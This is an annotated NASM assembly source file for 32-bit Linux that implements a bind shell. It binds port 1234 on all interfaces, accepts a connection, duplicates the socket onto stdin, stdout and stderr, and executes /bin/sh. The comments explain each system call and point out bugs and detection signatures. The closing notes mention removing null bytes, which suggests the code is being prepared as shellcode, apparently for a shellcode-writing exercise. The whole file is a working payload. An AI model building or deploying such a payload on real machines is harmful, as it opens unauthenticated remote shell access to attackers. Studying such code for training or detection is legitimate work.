tcp-bind.asm
; Filename: bind-tcp.nasm
; Author: nehcaij
;
; Purpose: to start a bind shell
;
; Target:  Linux/x86 (32-bit), NASM syntax, raw int 0x80 system calls.
;          Every socket operation goes through the socketcall(2)
;          multiplexer: eax = 0x66 (102), ebx = sub-call number,
;          ecx = pointer to the argument block, which is built by
;          pushing the C arguments onto the stack in reverse order.
; Flow:    socket -> setsockopt -> bind(0.0.0.0:1234) -> listen
;          -> accept -> dup2 x3 -> execve("/bin//sh")
; Regs:    esi = listening socket fd, live from part 1 through part 5
;          ebx = socketcall sub-call number (parts 1-5), then the
;                accepted connection fd (part 6)
; Note:    no syscall return value is ever checked; a failing socket(),
;          bind() or accept() is silently carried into the next call.
;          The listener binds all interfaces (sin_addr = 0.0.0.0), and
;          the sequence listen/accept followed by three dup2() onto
;          fds 0-2 and an execve of a shell is the behavioural
;          signature a host-based detector looks for.
global _start
section .text
_start:
; part 1
; socketcall(1, args)            ; ebx = 1 = SYS_SOCKET
; socket(2,1,0)                  ; socket(AF_INET, SOCK_STREAM, 0)
xor eax, eax                     ; eax = 0 -> protocol
xor ebx, ebx
inc ebx                          ; ebx = 1 -> SOCK_STREAM and the sub-call number
push eax                         ; protocol = 0
push ebx                         ; type     = SOCK_STREAM
push dword 0x2                   ; domain   = AF_INET
mov eax, 0x66 ; socketcall(102)
mov ecx, esp ; pointer to args in stack
int 0x80
mov esi, eax ; store new fd in esi (negative errno on failure; not checked)
; part 2
; socketcall(0xE, args)          ; ebx = 0xE (14) = SYS_SETSOCKOPT
; setsockopt(fd/esi, 1, 2, *(1), 4)
;   = setsockopt(esi, SOL_SOCKET(1), SO_REUSEADDR(2), &true, 4)
; ebx still holds 1 from part 1, so it doubles as the level argument.
push dword 0x4                   ; optlen  = 4
push true                        ; optval  = absolute address of the `true` word in .data
push dword 0x2                   ; optname = SO_REUSEADDR
push ebx                         ; level   = SOL_SOCKET (ebx == 1 here)
push esi                         ; sockfd
mov eax, 0x66 ; socketcall(102)
xor ebx, ebx                     ; redundant: the next mov overwrites ebx anyway
mov ebx, 0xE
mov ecx, esp ; pointer to args in stack
int 0x80                         ; return value ignored
; part 3
; socketcall(2, args)            ; ebx = 2 = SYS_BIND
; bind(fd/esi, &sockaddr, 16)
; struct sockaddr_in is built on the stack, last field first:
;   sin_zero[8] = 0, sin_addr = 0.0.0.0 (INADDR_ANY),
;   sin_port = 1234 in network byte order, sin_family = AF_INET (2)
push dword 0x0 ; sin_zero
push dword 0x0 ; sin_zero
push dword 0x0 ; sin_addr 0.0.0.0
push word 0xD204 ; port 1234 -- bytes 04 D2 in memory = htons(1234)
push word 0x2 ; sin_family AF_INET
mov eax, esp ; pointer to sockaddr (esp now points at sin_family, the struct start)
push dword 0x10 ; size of sockaddr 16 bytes
push eax ; ptr to sockaddr struct
push esi ; sockfd
mov eax, 0x66 ; socketcall(102)
xor ebx, ebx                     ; redundant, see part 2
mov ebx, 0x2 ; SYS_BIND
mov ecx, esp ; pointer to args in stack
int 0x80                         ; return value ignored
; part 4
; socketcall(4, args)            ; ebx = 4 = SYS_LISTEN
; listen(sockfd, 0);             ; backlog = 0
xor eax, eax
push eax                         ; backlog = 0
push esi                         ; sockfd
mov eax, 0x66 ; socketcall(102)
xor ebx, ebx                     ; redundant, see part 2
mov ebx, 0x4 ; SYS_LISTEN
mov ecx, esp ; pointer to args in stack
int 0x80                         ; return value ignored
; part 5
; socketcall(5, args)            ; ebx = 5 = SYS_ACCEPT (accept4 is a different sub-call, 18)
; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
;   called with addr = addrlen = NULL: blocks until a client connects,
;   the peer address is discarded.
xor eax, eax
push eax ; NULL                  ; addrlen
push eax ; NULL                  ; addr
push esi ; fd
mov eax, 0x66 ; socketcall(102)
xor ebx, ebx                     ; redundant, see part 2
mov ebx, 0x5 ; SYS_ACCEPT
mov ecx, esp ; pointer to args in stack
int 0x80
; eax now will contain return value: the connected socket fd, or a
; negative errno, which the code below does not check before using it
; part 6
; dup2(resultfd, 0)              ; eax = 0x3F (63) = __NR_dup2
; dup2(resultfd, 1)              ; ebx = oldfd (connection), ecx = newfd
; dup2(resultfd, 2)              ; redirects stdin/stdout/stderr to the socket
mov ebx, eax ; result fd
xor eax, eax                     ; redundant: the next mov overwrites eax anyway
mov eax, 0x3F
mov ecx, 0x0                     ; newfd = 0 (stdin)
int 0x80
mov eax, 0x3F                    ; eax was clobbered by the previous syscall's return value
inc ecx                          ; newfd = 1 (stdout)
int 0x80
mov eax, 0x3F
inc ecx                          ; newfd = 2 (stderr)
int 0x80
; part 7
; execve(*"/bin/sh", NULL, NULL)
; The path is built on the stack as "/bin//sh\0": the doubled slash
; pads it to exactly 8 bytes (two dwords); path resolution treats "//" as "/".
xor eax,eax
push eax                         ; NUL terminator
push 0x68732f2f ; hs// - take care to the little endian representation
push 0x6e69622f ; nib/
mov ebx, esp ; pointer to command string
mov ecx, eax                     ; argv = NULL (accepted by Linux; not portable)
mov edx, eax                     ; envp = NULL
mov al, 0xB ; __NR_execve        ; eax is already 0, so only the low byte is set
int 0x80
; exit gracefully -- only reached if execve failed
mov eax, 1                       ; __NR_exit
mov ebx, 0                       ; status 0, which hides the execve failure from the parent
int 0x80
section .data
true: dw 0x00000001              ; dw emits only a 16-bit word (bytes 01 00); the
                                 ; literal is written as 32-bit, and part 2 passes
                                 ; optlen = 4, so setsockopt reads 2 bytes past this
                                 ; word -- correct only if those bytes happen to be zero.
The size of the sockaddr structure is 16 in decimal, i.e. 0x10, not 0x20.
The 2nd argument of execve (argv) can be set to NULL.
need to remove null bytes
The port number must be written byte-swapped for the little-endian stack push, i.e. 1234 (0x04D2) becomes 0xD204 so that it lands in memory in network byte order.